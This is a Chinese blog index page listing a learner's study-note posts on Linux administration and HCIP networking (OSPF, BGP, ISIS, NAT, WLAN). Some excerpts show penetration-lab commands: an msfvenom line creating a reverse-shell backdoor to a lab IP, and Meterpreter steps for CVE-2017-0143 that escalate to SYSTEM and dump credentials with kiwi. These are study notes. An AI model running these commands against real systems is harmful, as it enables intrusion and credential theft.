- 博客(63)
- 收藏
- 关注
RSS订阅原创 SSH暴力破解
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
2023-06-12 18:07:20
2440
原创 CVE-2017-0143漏洞利用等
metepreter>ps -S "csrss" (搜索csrss.exe进程,获取进程号)metepreter>migrate 进程号 (迁移进程,获取SYSTEM权限)metepreter>creds_all (获取所有凭证,加密的密码会进行解析)metepreter>load kiwi (加载kiwi模块)
2023-06-08 20:34:30
201
原创 kali系统渗透
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.142 //设置攻击目标。msf6 auxiliary(scanner/rdp/ms12_020_check) > run //攻击。在物理机浏览器访问: http://192.168.10.143/doc/ //查看网站列表。
2023-06-07 18:03:11
1076
原创 Linux中的ACL以及加固
然后,你可能有一个检查是否是在工作时间登录的模块,如果标记为 [default=die],那么如果这个模块检查失败(也就是说,用户在非工作时间尝试登录),那么整个认证过程立即失败,不再执行任何其他模块。然后,你可能有一个检查是否是在工作时间登录的模块,如果标记为 [default=die],那么如果这个模块检查失败(也就是说,用户在非工作时间尝试登录),那么整个认证过程立即失败,不再执行任何其他模块。如果此模块失败,那么即使其他模块成功,整个认证过程也会在所有模块执行完后被标记为失败。
2023-06-05 14:02:10
909
原创 linux第六七天 which find进程等
该值越高,进程优先级越低。[root@zbx ~]# grep -v "^$" /etc/selinux/config | grep -v "#" // 去掉空行和带#号的行。//通过管道符把student的密码修改为123。[root@zbx ~]# find /var/log/ -mtime +30 -type f // 查找超过30天未修改的普通文件。[root@zbx ~]# find /usr/bin/ -perm -u=s //查找属主设置s标志的文件(SUID)
2023-06-02 17:58:51
477
原创 Linux第五天
nmap -sV -p 80 192.168.10.223 //扫描端口的命令 对10.223这个主机通过80端口进行扫描。mysql_secure_installation //启动安全安装脚本。
2023-05-31 20:23:59
61
原创 Linux第四天
systemctl is-active httpd //查询httpd是否开启。less /var/log/secure //查看安全日志。getenforce //检查当前的SELinux运行状态。用unzip命令解压 zip命令。
2023-05-30 20:19:50
45
原创 Linux第三天
yum repolist -v //查看软件安装的历史列表。//在 /etc/fstab vim中进行开机挂载。man手册一般用于工具 比如nmap。lsblk :查看光盘内容。
2023-05-29 18:02:23
58
原创 linux周六串讲
C:\Users\DELL>scp -r D:\123\123.txt root@192.168.10.233:/tmp/ //在Windows CMD窗口把 D盘下的123txt文件。cat /etc/resolv.conf //查看DNS地址。hostname //临时修改主机名。
2023-05-27 12:06:54
1093
原创 Linux第二天
mv /root/mulu1/grub2 /root/mulu1/grub2.bak //虽然是mv移动,实际是改名操作。rw-r--r--. 1 root root 1954 5月 26 16:33 /etc/passwd。cp -r /boot/grub2 /root/mulu1 //把grub2 复制到mulu1。ls /root/*.cfg //查看root目录下所有以.cfg后缀的内容。ls -A /root //查看root文件下所有的隐藏文件。
2023-05-27 09:15:55
2010
原创 Linux第一节
scp -r d:\12.txt root@192.168.10.233:/tmp //在win+R界面把12.txt文件上传到192.168.10.233中/tmp目录里。C:\Users\DELL>scp -r root@192.168.10.233:/etc/passwd D:\ //把etc下的passwd文件下载到D盘。cat /etc/resolv.conf //查看DNS的命令。在登录界面,alt+F1--F6 / /开启控制台切换。nmtui //网络使用文字显示的命令。
2023-05-25 18:03:26
712
原创 远程FTP连接等
R1-aaa]local-user ftp ftp-directory flash: //FTP需要这一步。[R1]ftp server enable //开启FTP服务。[R1-ftp]dir //查看当前FTP服务器中的文件列表。[R1-ftp]put shengji.txt //上传文件。[R1-ftp]get 文件名 //下载相应的文件。dir //查看本地文件,是否下载成功。[R1-ftp]q //返回R1设备。
2023-05-24 17:32:33
998
原创 hcip晚上 BGP内容
策略路由:已经形成路由表了 ,但是我就是不按照路由表的下一跳转发,我按照我自己的想法转 发数据,策略路由优先级高于路由表,是一种VIP服务。路由策略:路由策略可以过滤路由信息,影响路由表的生成,可以改变路由表的大小。ip ip-prefix:地址前缀列表:一个更加精确的过滤器(抓信息的)ACL:访问控制列表,本质上是一个流量过滤器(抓流量的,抓信息的)
2023-05-22 20:54:23
52
原创 三阶段项目
totally nssa:完全不那么stub的区域:不要3 4 5类,要7类(不要其他区 域产生的外部路由也不要其他区域的路由信息,要自己区域外部路由)NSSA:不那么stub的区域:不要4 5类lsa,要7类lsa(不要其他区域产生 的外部路由,要自己区域产生的外部路由)5类LSA:外部路由信息--ASBR产生---所有区域每一台设备。
2023-05-22 18:07:25
559
原创 周六晚周日全天Hcip BGP
运行BGP的路由器被称为BGP发言者( BGP Speaker),或BGP路由器。虚拟接口的优势就是不会down,具有稳定性,所以在BGP OSPF中很受欢迎。3.具有非常丰富的路由控制策略,可以实现灵活的选路。ISIS,前提我是level 1,收到ATT位置为1 的路由是默认路由。2.可以传输大量的路由,支持大规模网络。我们要在不同的AS之间进行通信,需要使用BGP协议。dis bgp peer //查看BGP邻居表。内部邻居建邻居的时候,可以跨网段跨设备建立邻居。和虚拟接口建立邻居,加一条。
2023-05-21 17:42:04
499
原创 三阶段项目相关内容
原因:MAC地址冲突了 ,DHCP将252地址分配给了PC,与SW6上的252地址冲突。[SW6]stp instance 0 priority 0 //不让他走下面,所以把实例0优先级改成0。display stp instance 10 brief //只看实例10的端口角色。①cost开销值(到达跟网桥的距离)①cost开销值(到达跟网桥的距离)指定端口:根网桥上所有端口都是指定端口。备份网关:监听vrrp报文,主网关发送vrrp报文时间的3倍。阻塞端口[非指定端口](AP)
2023-05-19 18:04:08
594
原创 hcip晚上课程
在广播型网络中,非DIS生成的信息网段信息,DIS描述的是拓扑信息。在ISIS中,cos值t默认是10,范围是1--63。CSNP10秒发一次周期性的,但是在P2P中只发一次。在OSPF中,cost值范围是1--65535。传递路由的入接口,就是数据转发的出接口。ISIS中只有两种类型,广播和P2P。DIS可以被抢占,而DR不能被抢占。
2023-05-18 20:52:30
56
原创 AC,AP以及三阶段项目
收:如果收到的数据,没有携带任何标签,则使用该端口的PVID(端口的、vlan 号),表示的数值。发:如果发送的数据,所携带的标签,和端口的PVID所相同,则摘掉标签。摄像头部署,路由交换,安全设备,服务器,存储,大数据分析。周期:2个月(机房装修,综合布线)设备调试 2天。实施范围:有线网络,无线网络,运维系统,准入认证。2.建立capwap隧道(AC控制AP的专属通道)特点:任务重,时间短,多方协作。5.AC将VAP文件下发给AP。
2023-05-18 19:42:26
501
原创 WLAN,AP等
WLAN 是无线局域网(Vireless Local Area Network)的简称。瘦AP:只有一个功能,散发无线信号,通过AC来统一配置。胖AP:功能多,但是只能单独管理。无线网络部署方案: AC直连式组网 AC旁挂式组网。上图是在分配给AP,地址的同时顺便告诉AP,AC的地址。//选择接口与AP建立capwap隧道。简单理解:无线就是网线的一个延长。AC:无线控制器--统一管理AP。上图是AP中查看MAC的命令。//查看交换机的桥MAC地址。DHCP终级配置在网关接口。
2023-05-17 18:02:31
497
原创 BGP路由策略,IPV6
当BGP 由表存在多条相同路由,会产生多个转发路径,BGP 会根据这些路由的属性,选择一条最优的。IPV4:位数 32位 ,点分十进制 数量:约等于43亿 缺点:地址不够用。必须要携带的属性:AS-PATH 起源属性 下一跳。终级解决方案:IPV6地址 位数128位。ospfV2 和OSPFV3的区别: 没有network。从EBGP来的路由,传给|BGP S居时,下一跳不变。缩写方法:去掉左边不必要的 0。从|BGP来的路由,不会传给IBGP邻居。展示方式:冒分16进制。
2023-05-16 20:26:59
726
原创 bgp路由策略
上图中,有*和>,是有效最佳的。而没有*和没有>,是无效的,下一跳不可达。1--64511是公有AS 64512-65534为私有AS。* - valid 有效的, > - best 最佳的。特点:匹配路由精准,既可以匹配前缀,又可以匹配掩码。refresh bgp all export //刷新一下。作用:专门做路由过滤的,不能过滤数据包。//属于哪个大的联盟 AS200。//和子类AS 65002建立邻居。//连着一个子类AS 65002。本地优先级属性,默认是100,
2023-05-15 18:08:17
558
原创 HCIP周日ISIS
net地址:网络实体名,net是一种特殊的NSAP 长度:0-20字节,最小是8,最大是20,每一台运行ISIS的路由器至少要有一个net地址,但可以有多个,但是如果有多个,要求net地址中的system-id要相同。早期的ISIS是基于CLNP(无连接网络协议)而开发的,为了继续追逐TCP/IP的发展,为了支持IP网络,ISIS也升级称为了集成ISIS。Holdtime :保持时间,表示的LSP的存活时间,是倒计时,在ISIS中,LSP的最大保持时间(存活时间)是1200S。比如:49.0010。
2023-05-14 18:00:38
331
原创 bgp,路由反射器,水平分割等晚上串讲
bgp 100 :100表示的是AS号,该AS号在建立邻居关系的过程中,是需要发送给对方的,不仅仅 是本地有效。其次选择真实接口的IP地址作为router-id,如果是多个,也是选择最大的。EBGP:外部bgp邻居,自己的AS号与邻居的AS号不同。类型:IBGP:内部的BGP邻居,自己的AS号与邻居的AS号相同。2.数据库:包含的是路由(自己产生的和别的邻居设备给自己的)router-id:BGP协议中,表示每个设备的名字,格式都是IPV4的格式。
2023-05-12 20:57:40
225
原创 BGP防环,路由反射器,BGP联盟
上图中 R7学到了 R13的路由,R13也学到了R7的路由,但是尝试ping的时候显示不通,原因是BGP没带上上图中间的R11玩,R7中的10.10.1.1和R13中的10.10.5.5是在BGP中传递的,所以上图中间的R11没有学到 10.10.1.1和10.10.5.5的路由,所以不通。非客户发给反射器的路由,反射器不会反射给非客户,其他情况都会反射,所以是 非非不反射。display bgp peer //查看bgp邻居表。
2023-05-12 18:07:08
436
原创 hcip晚上课程
3类LSA作用:将区域内的1、2类LSA计算出来的路由,变成3类在其他区域泛洪,实现区域与区域之间的通信。5类的LSA可以传输到OSPF网络中的任何地方,在传输的过程中,LSA没有任何变化。3类LSA 有网段 掩码 开销值,才能算出来最短的路径。4类的LSA是和ASBR同一区域的ABR产生的。数据传递的出口和路由传递的入口是同一个口。
2023-05-11 20:54:17
32
原创 OSPF虚链路,GRE隧道,路由策略,LSA过滤
** 别纠结,他这样做应该是研发人员碰到的不得已的问题,只能区别对待这两种情况,相对于对静态路由,为默认路由 0.0.0.0 0.0.0.0单独设计了一条命令,有点奢侈。在网上收集到网友这样的解释,我认为是说的通的:协议设计上的规定,用来防范意外环路的。防止引入静态路由时注入默认路由,产生环路。import-route static 命令不能引入外部路由的默认路由,OSPF通过路由表更新学习到外部路由的默认路由,interface tunnel 0/0/3 //建立隧道接口。
2023-05-11 18:42:44
441
原创 chatGPT提问,BGP内容
使用import宣告的。3 ) 丰富的路由控制策略,实现灵活的路由选路。动态路由:内部网关协议:如RIP ISIS OSPF 在同一个公司内部运行的路由协议。peers in established state:1 表示的是有多少有效的邻居。BGP是应用层的协议,端口号是 TCP179,因为用的是TCP协议,所以稳定性非常好。2.传递大量路由(以万为单位)BGP 作用:在AS之间动态的交互路由信息,实现公司与公司之间的互访。-相当于ospf中的FULL状态,表示即建立了邻居表同步了数据库,
2023-05-11 17:57:08
315
原创 OSPF,NSSA等晚上串讲
3.NSSA区域:即,not so stub area ,继承了stub区域的特点:不要45类LSA,但是,也和 stub区域有一丢丢的不同,比如:nssa区域是允许'外部路由'如果引入的外部路由在ospf中的ASBR那个路由表中不稳定,那么随之而来的就是表示该外部静态路由的5类LSA也就不稳定,那就会影响企业内部的所有ospf路由器和路由表都不稳定。只发汇总后的LSA,不再发之前的明细LSA,增强了对端设备的数据库的稳定性。
2023-05-09 20:55:49
63
原创 OSPF,NSSA,汇总安全认证等
进入接口,[R2-GigabitEthernet0/0/1]ospf authentication-mode simple cipher 123456。[R4-ospf-1]default-route-advertise //在OSPF里宣告默认路由。配置MD5认证的规则是,链路两端接口的认证类型,key-id、密码都要相同。7类变成5类才能泛洪到其他区域,才能在其他区域进行传播。邻居之间做接口认证 :认证类型一致,认证密码一致。lookback接口是本地环回接口,虚接口,三层接口。
2023-05-09 18:02:04
103
原创 ospf的12345类型晚上串讲
作用:自我介绍,表示的是路由器本身的每个链路的情况,比如说链路的开销值,链路上连接着哪个设备、邻居,相当于自我介绍。*****注意:ABR可以将从0区域接收过来的3类LSA,变化一次Advrouter,传输到其它的非0区域;特点:在该类型的LSA,在传输过程中,没有任何区域限制,哪里有OSPF,5类就能传输到哪里。******小结:通过1类LSA和2类LSA,就可以完全实现一个区域内部的连接的确定。sequence:表示的是LSA的序列号,用于体现LSA的新旧程度,越大表示越新。
2023-05-08 21:03:36
76
原创 OSPF,LSDB,LSA分类
3类LSA在传输过程中,每经过一个ABR,3类LSA的通告路由器就会变成所经过的那个ABR的router-id。如果数据链路层是以太网协议,那么它的类型是广播 如果二层是PPP协议,那么它默认类型是点到点协议。状态,发送第二个DD报文的收获,才会在DD报文中,携带--数据库描述信息。状态,发送第一个DD报文,DD报文的作用是选举主从,目的是让DD报文传递的时候更可靠。上图中告诉我们有一个网段是1.0 掩码是24 类型是末梢类型,描述的是网段信息。4类的LSA是和ASBR同区域的ABR设备生产的。
2023-05-08 18:00:57
559
原创 周日hcip课程ospf报文网络类型等
LSR报文:用于请求对方数据库摘中的LSA(链路状态通告) 小红:小兰,我想要你家的猪肉 小兰:小红,我想要你家的黄瓜。&:Type:类型:表示的是LSA的各种类型,总共包含1、2、3、4、5、7(其他的LSA的类型,在IE中会讲解)&:LinkState ID:名字:表示的LSA的名字。
2023-05-07 18:00:51
43
原创 OSPF晚上串讲
5.LSACK 链路状态确认报文,用于对LSR和LSU的确认作用,里面包含的也是数据库条目的简要 信息。two-way 双向通信状态,表示的是接收过来的hello报文中 发现了自己的router-id。init 初始化状态,表示的是本地设备能够接到对方发送过来的ospf hello报文。exchange 交换状态,该阶段发送了大量的DD报文,我们把它称之为LSA的头部信息。3.LSR 链路状态请求,里面包含的是数据库条目的简要信息。
2023-05-06 20:55:16
28
原创 OSPF内容
修改DR的优先级:进入接口 int g0/0/0 , ospf dr-priority 100 , 然后,分别在R1和R2 输入 reset ospf process 重启进程。在每一个网段中,接口都要选择DR和BDR,DR和BDR不是路由器的概念,说的是接口的概念。两台设备的区域号不同,无法建立邻居关系,所以两台设备互联的接口区域号必须一致。不同进程的OSPF,在同一设备上是相互隔离的,网络传递过程中,不携带进程号。只有类型是广播或非广播,才会选DR和BDR ,其他状态不会,优先级越大越好。
2023-05-06 18:01:35
30
原创 二阶段项目以及OSPF相关
第二种解决方案: 在dhcp服务器开启:dhcp server ping 功能 为防止IP地址重复分配导致地址冲突,DHCP Server为客户端分配地址前, 需要先执行dhcp server ping命令发送Ping报文探测IP地址的使用情况, 如果在发送了规定的多个ping报文后,在规定的响应的时间内没有得到应答, 则认为本网段内没有设备使用该IP地址,该地址可以分配给该客户端使用 地址探测确保客户端被分得的IP地址是唯一的。区域号为0是骨干区域 不为0是非骨干区域。LSA:链路状态信息。
2023-05-05 17:57:42
126
原创 hcip课程第一天OSPF
OSPF配置命令: ospf 1 router-id 1.1.1.1 (router-id是给它起的一个名,1.1.1.1很像IP地址,但是不是IP地址)动态路由 IGP:内部网关路由协议,在同一个AS(自治系统)内部使用的(在企业内部或数据中心内部使用)display ospf peer brief 验证邻居关系是否建立 //显示邻居表的简要信息。进程号的作用:在同一个设备上,区分不同的OSPF路由协议,EGP:外部网关路由协议,在不同的AS之间使用。骨干区域:0 非骨干区域:不为0。
2023-05-04 20:55:51
44
原创 NAT网络地址转换
nat alg ftp enable //开启FTP协议的nat alg(应用层网关)功能,如果FTP数据想通过nat来传输,需要nat开启alg功能 一般开nat alg all enable 这个功能只针对华为设备 思科设备不需要。
2023-05-04 19:11:53
195
原创 高级ACL以及NAT
R1-GigabitEthernet0/0/1]undo traffic-filter inbound //在接口下删除入方向的调用规则。规则10定义:允许192.168.1.1这个地址,可以访问192.168.3.1这台服务器的80端口(网站服务)规则20定义:允许192.168.1.1这个地址,可以访问192.168.2.0网段的所有主机的所有服务。售后部主机Client1可以访问行政部的所有主机的所有服务。规则30定义:拒绝192.168.1.1这个地址,访问任何主机的任何服务。
2023-04-28 18:07:21
329
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人